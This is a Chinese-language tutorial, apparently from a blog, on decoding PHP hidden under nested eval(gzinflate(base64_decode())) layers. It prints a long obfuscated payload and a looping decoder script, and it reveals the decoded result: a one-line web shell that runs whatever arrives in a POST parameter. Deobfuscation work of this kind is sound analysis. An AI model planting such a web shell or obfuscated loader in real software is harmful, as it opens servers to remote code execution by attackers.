Eval(gzinflate(base64 decode()))

首先,针对一层加密的,我们可以直接把eval改为echo即可解密,这里我就不多解释了,今天要解密的代码如下:

解密方法

<?php
eval(gzinflate(base64_decode('DdS3EqNWAEDRfn/Eu0NBTmOPd8hCpEcWNB7CAyRA5Pj13u42p72///3n99iMP37APet+1vf7W3XZCn/m2QIZ6r8SFkMJf/4ll96jnWxdUGSvipB2wnTz8xBSECiRrp8C1DlCud/NqVu1lcEKLGq1V+jN3hxKkTvHZ6uSVWv0zUV0hZ1f9a9xJPwBpYbrQc0Xw5YJAUra6iKodOSy5tPe7Gt7fRLuqRnu0IO7HmRrVD1fxFeK2f2O1fv5wqik6ci0XuSjF4Swsih9w1QiGhdHod7s1r9EhnivBnLsmn4xa4lbDA6WrAPtdbdEHOZswZhkFO3s0/HloCA9DY8P4+bJkXLIdchUxFHPTxKZWt+WnWmGLXhiQHN3qm0Q6VnoO3vY/ckHsWOIGlV8XMV+UaZEcKBPsZgj+S7kKISh2ZQiNnVK4zlHRIt6B3jDl1Q4+e1dy5ZqmXb73JPXtWn+17i/hvBQFlEdrFopoTeovgwy5WxlIZVZNEnYBYkG6g9OQrBgxMC7yVs6jwjMpoeCIIio/dFLm3cHTaA141F+CvRT0swD9PPbqdBl3Hyo7kclQMFmTIumUi3tyVEMWI6S7DE3Ycn148vqQGTmZJx9OU5gjQg5gjN2jZ1QDgALD40TJJQQGj9S4JXm6GlyYW3wDViCyCEpeB4wiJWX8za3/WYMePG2i03eKDCHrtUlY1qsOEje1ZNI0Vys8DHUy5iAW/yVvs+mESrbTA9BLQtsI52NNSsmEQ5J8FHadb0gFXiQsWTHoOfByWnW9zaJz/uTND4Mts76xBqIVB48F1l7rvf50Dg+XBai/DzNS40ITBXbsJxjsOjqWKN9/piDp6nOSUu+0qwz8KM4ibR1MLL6TpK4PKjNd+0IWZE/8R3myU3TJ+X3/ZiO1ewlH/p8PBoGh6C+71RfrG7Ir7kSri3QDmWGZ+v3rIjfsIqVqCfPGwZPxV6+CoRE60eY1DhE57EGl77cJtPd7aKbY44XEjjTsqZGpaYLy4VEWORuuCAcYz0TTtc8Ui7UpgaqpU7NSSi4r7wnLLHlmXA8tbSA+9CZvhz77ZWq7A37rvoMFytqNlzcb6NQnEu/wzMusfJBn68TzeTtcpGEdujKeOnrFngtW8RO7VTMIm5evd80RnEQ0+O78O+JYEMd5a9stxWXWxWJaKV6qiTPYXxFV/rdUhFGQmb+jbmHML4fHF/tLILuYKYRNEHr6q9fv379/eP3nxn9Dw==')));
?>
我尝试过把eval改为echo结果发现还是类似的东西,经过查找终于发现了解决办法。

解密方法2

<?php
/**
 * Created BY 独自等待
 * Date : 13-6-25
 * Time : 下午2:06
 * FileName : decode_gzinflate.php
 * 欢迎访问独自等待博客www.waitalone.cn
 */
//已经加密的文件内容
$a = "eval(gzinflate(base64_decode('这里面放BASE64代码')));";
function decodephp($a)
{
 $max_level = 300; //最大层数
 for ($i = 0; $i < $max_level; $i++) {
 ob_start();
 eval(str_replace('eval', 'echo', $a));
 $a = ob_get_clean();
 if (strpos($a, 'eval(gzinflate(base64_decode') === false) {
 return $a;
 }
 }
}
echo decodephp($a);
?>
最终经过密码得到源代码如下:
<?php eval($_POST[coo0l]);?>